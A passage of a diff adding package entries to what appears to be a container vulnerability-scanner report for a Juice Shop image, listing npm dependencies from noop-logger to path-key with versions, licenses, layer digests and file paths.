"noop-logger", + "Identifier": { + "PURL": "pkg:npm/noop-logger@0.1.1", + "UID": "e3e279601f73a7ca" + }, + "Version": "0.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/noop-logger/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "nopt@4.0.3", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@4.0.3", + "UID": "3449a68c9cb0b988" + }, + "Version": "4.0.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/nopt/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "nopt@5.0.0", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@5.0.0", + "UID": "2a99abb90b675dd1" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/nopt/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "nopt@8.1.0", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@8.1.0", + "UID": "1299ee9878d81b72" + }, + "Version": "8.1.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-gyp/node_modules/nopt/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "normalize-path@2.1.1", + "Name": "normalize-path", + "Identifier": { + "PURL": "pkg:npm/normalize-path@2.1.1", + "UID": "7e88d55f29c02660" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/normalize-path/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "normalize-url@2.0.1", + "Name": "normalize-url", + "Identifier": { + "PURL": "pkg:npm/normalize-url@2.0.1", + "UID": "6784bfef9ee63c38" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/normalize-url/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "notevil@1.3.3", + "Name": "notevil", + "Identifier": { + "PURL": "pkg:npm/notevil@1.3.3", + "UID": "349375f6b5c60a6" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/notevil/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "npm-bundled@1.1.2", + "Name": "npm-bundled", + "Identifier": { + "PURL": "pkg:npm/npm-bundled@1.1.2", + "UID": "6d9acaad9b7c01d" + }, + "Version": "1.1.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/npm-bundled/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "npm-normalize-package-bin@1.0.1", + "Name": "npm-normalize-package-bin", + "Identifier": { + "PURL": "pkg:npm/npm-normalize-package-bin@1.0.1", + "UID": "ac5d3f693d682861" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/npm-normalize-package-bin/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "npm-packlist@1.4.8", + "Name": "npm-packlist", + "Identifier": { + "PURL": "pkg:npm/npm-packlist@1.4.8", + "UID": "406157415992d0e8" + }, + "Version": "1.4.8", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/npm-packlist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "npmlog@4.1.2", + "Name": "npmlog", + "Identifier": { + "PURL": "pkg:npm/npmlog@4.1.2", + "UID": "dd8630ad1b293b4a" + }, + "Version": "4.1.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/npmlog/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "npmlog@6.0.2", + "Name": "npmlog", + "Identifier": { + "PURL": "pkg:npm/npmlog@6.0.2", + "UID": "d26fbfd3cff3737c" + }, + "Version": "6.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/npmlog/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "number-is-nan@1.0.1", + "Name": "number-is-nan", + "Identifier": { + "PURL": "pkg:npm/number-is-nan@1.0.1", + "UID": "7446d136f457b47" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/number-is-nan/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "nw-pre-gyp-module-test@0.0.1", + "Name": "nw-pre-gyp-module-test", + "Identifier": { + "PURL": "pkg:npm/nw-pre-gyp-module-test@0.0.1", + "UID": "2ee697eacaeb37d6" + }, + "Version": "0.0.1", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/lib/util/nw-pre-gyp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object-assign@4.1.1", + "Name": "object-assign", + "Identifier": { + "PURL": "pkg:npm/object-assign@4.1.1", + "UID": "877fa0c4d6510a81" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object-assign/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object-inspect@1.13.4", + "Name": "object-inspect", + "Identifier": { + "PURL": "pkg:npm/object-inspect@1.13.4", + "UID": "23b16982da9f6c56" + }, + "Version": "1.13.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object-inspect/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object-is@1.1.6", + "Name": "object-is", + "Identifier": { + "PURL": "pkg:npm/object-is@1.1.6", + "UID": "a7112e93441482c3" + }, + "Version": "1.1.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object-is/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object-keys@1.1.1", + "Name": "object-keys", + "Identifier": { + "PURL": "pkg:npm/object-keys@1.1.1", + "UID": "b5e4767a71af2645" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object-keys/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object.assign@4.1.7", + "Name": "object.assign", + "Identifier": { + "PURL": "pkg:npm/object.assign@4.1.7", + "UID": "8c41a13e79cc2dbb" + }, + "Version": "4.1.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object.assign/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object.defaults@1.1.0", + "Name": "object.defaults", + "Identifier": { + "PURL": "pkg:npm/object.defaults@1.1.0", + "UID": "919f643e81c96b4f" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object.defaults/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object.map@1.0.1", + "Name": "object.map", + "Identifier": { + "PURL": "pkg:npm/object.map@1.0.1", + "UID": "62199a1dafdebb30" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object.map/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "object.pick@1.3.0", + "Name": "object.pick", + "Identifier": { + "PURL": "pkg:npm/object.pick@1.3.0", + "UID": "9fcfe219c8d327f5" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/object.pick/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "on-finished@2.3.0", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.3.0", + "UID": "6427c37bfd8866a6" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/morgan/node_modules/on-finished/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "on-finished@2.4.1", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.4.1", + "UID": "ca3f12c2236dd362" + }, + "Version": "2.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/on-finished/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "on-headers@1.1.0", + "Name": "on-headers", + "Identifier": { + "PURL": "pkg:npm/on-headers@1.1.0", + "UID": "2b0d6ddf95fc4ec4" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/on-headers/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "once@1.4.0", + "Name": "once", + "Identifier": { + "PURL": "pkg:npm/once@1.4.0", + "UID": "1e055e8ab514de9d" + }, + "Version": "1.4.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/once/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "one-time@1.0.0", + "Name": "one-time", + "Identifier": { + "PURL": "pkg:npm/one-time@1.0.0", + "UID": "b01c0b4d56049b34" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/one-time/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "opentype.js@0.7.3", + "Name": "opentype.js", + "Identifier": { + "PURL": "pkg:npm/opentype.js@0.7.3", + "UID": "1f4cf4fd9a886610" + }, + "Version": "0.7.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/opentype.js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "os-homedir@1.0.2", + "Name": "os-homedir", + "Identifier": { + "PURL": "pkg:npm/os-homedir@1.0.2", + "UID": "7076e3cef2ee0cd4" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/os-homedir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "os-tmpdir@1.0.2", + "Name": "os-tmpdir", + "Identifier": { + "PURL": "pkg:npm/os-tmpdir@1.0.2", + "UID": "2d57f1401831411f" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/os-tmpdir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "osenv@0.1.5", + "Name": "osenv", + "Identifier": { + "PURL": "pkg:npm/osenv@0.1.5", + "UID": "782cd0d95751b5de" + }, + "Version": "0.1.5", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/osenv/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "otplib@13.4.0", + "Name": "otplib", + "Identifier": { + "PURL": "pkg:npm/otplib@13.4.0", + "UID": "88ca68b770879816" + }, + "Version": "13.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/otplib/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-cancelable@0.4.1", + "Name": "p-cancelable", + "Identifier": { + "PURL": "pkg:npm/p-cancelable@0.4.1", + "UID": "d81c7677d421c52a" + }, + "Version": "0.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/p-cancelable/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-event@2.3.1", + "Name": "p-event", + "Identifier": { + "PURL": "pkg:npm/p-event@2.3.1", + "UID": "6c95fbcee5502c3d" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/p-event/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-finally@1.0.0", + "Name": "p-finally", + "Identifier": { + "PURL": "pkg:npm/p-finally@1.0.0", + "UID": "147a451056ef79da" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/p-finally/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-is-promise@1.1.0", + "Name": "p-is-promise", + "Identifier": { + "PURL": "pkg:npm/p-is-promise@1.1.0", + "UID": "d0480df3f7dff567" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/p-is-promise/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-limit@2.3.0", + "Name": "p-limit", + "Identifier": { + "PURL": "pkg:npm/p-limit@2.3.0", + "UID": "ba4ac05c9d051578" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/p-limit/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-locate@4.1.0", + "Name": "p-locate", + "Identifier": { + "PURL": "pkg:npm/p-locate@4.1.0", + "UID": "fe8f4bca90b0e38c" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/p-locate/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-map@4.0.0", + "Name": "p-map", + "Identifier": { + "PURL": "pkg:npm/p-map@4.0.0", + "UID": "efbf04f50ca247c2" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/p-map/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-map@7.0.4", + "Name": "p-map", + "Identifier": { + "PURL": "pkg:npm/p-map@7.0.4", + "UID": "68b7a0df5e3ff479" + }, + "Version": "7.0.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cacache/node_modules/p-map/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-timeout@2.0.1", + "Name": "p-timeout", + "Identifier": { + "PURL": "pkg:npm/p-timeout@2.0.1", + "UID": "a963c7b5e3e5fe9e" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/p-timeout/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "p-try@2.2.0", + "Name": "p-try", + "Identifier": { + "PURL": "pkg:npm/p-try@2.2.0", + "UID": "ba9209bbeec80e81" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/p-try/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "package-json-from-dist@1.0.1", + "Name": "package-json-from-dist", + "Identifier": { + "PURL": "pkg:npm/package-json-from-dist@1.0.1", + "UID": "c20c67a6c368f73" + }, + "Version": "1.0.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/package-json-from-dist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pako@0.2.9", + "Name": "pako", + "Identifier": { + "PURL": "pkg:npm/pako@0.2.9", + "UID": "d6ab77d8b6f965b" + }, + "Version": "0.2.9", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unicode-trie/node_modules/pako/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "pako@1.0.11", + "Name": "pako", + "Identifier": { + "PURL": "pkg:npm/pako@1.0.11", + "UID": "f6ae1563ae2689a0" + }, + "Version": "1.0.11", + "Licenses": [ + "(MIT AND Zlib)" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/pako/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "parse-filepath@1.0.2", + "Name": "parse-filepath", + "Identifier": { + "PURL": "pkg:npm/parse-filepath@1.0.2", + "UID": "d8bbcf83081e5938" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/parse-filepath/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "parse-passwd@1.0.0", + "Name": "parse-passwd", + "Identifier": { + "PURL": "pkg:npm/parse-passwd@1.0.0", + "UID": "8ab4f25e87a544c4" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/parse-passwd/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "parseurl@1.3.3", + "Name": "parseurl", + "Identifier": { + "PURL": "pkg:npm/parseurl@1.3.3", + "UID": "f11fade91795a9f6" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/parseurl/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-exists@4.0.0", + "Name": "path-exists", + "Identifier": { + "PURL": "pkg:npm/path-exists@4.0.0", + "UID": "60d3e8cea198c666" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-exists/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-is-absolute@1.0.1", + "Name": "path-is-absolute", + "Identifier": { + "PURL": "pkg:npm/path-is-absolute@1.0.1", + "UID": "6e5c7ee7e6cce4d0" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/path-is-absolute/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "path-key@3.1.1", + "Name": "path-key", + "Identifier": { + "PURL": "pkg:npm/path-key@3.1.1", + "UID": "2d165060b8eb1e92" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": 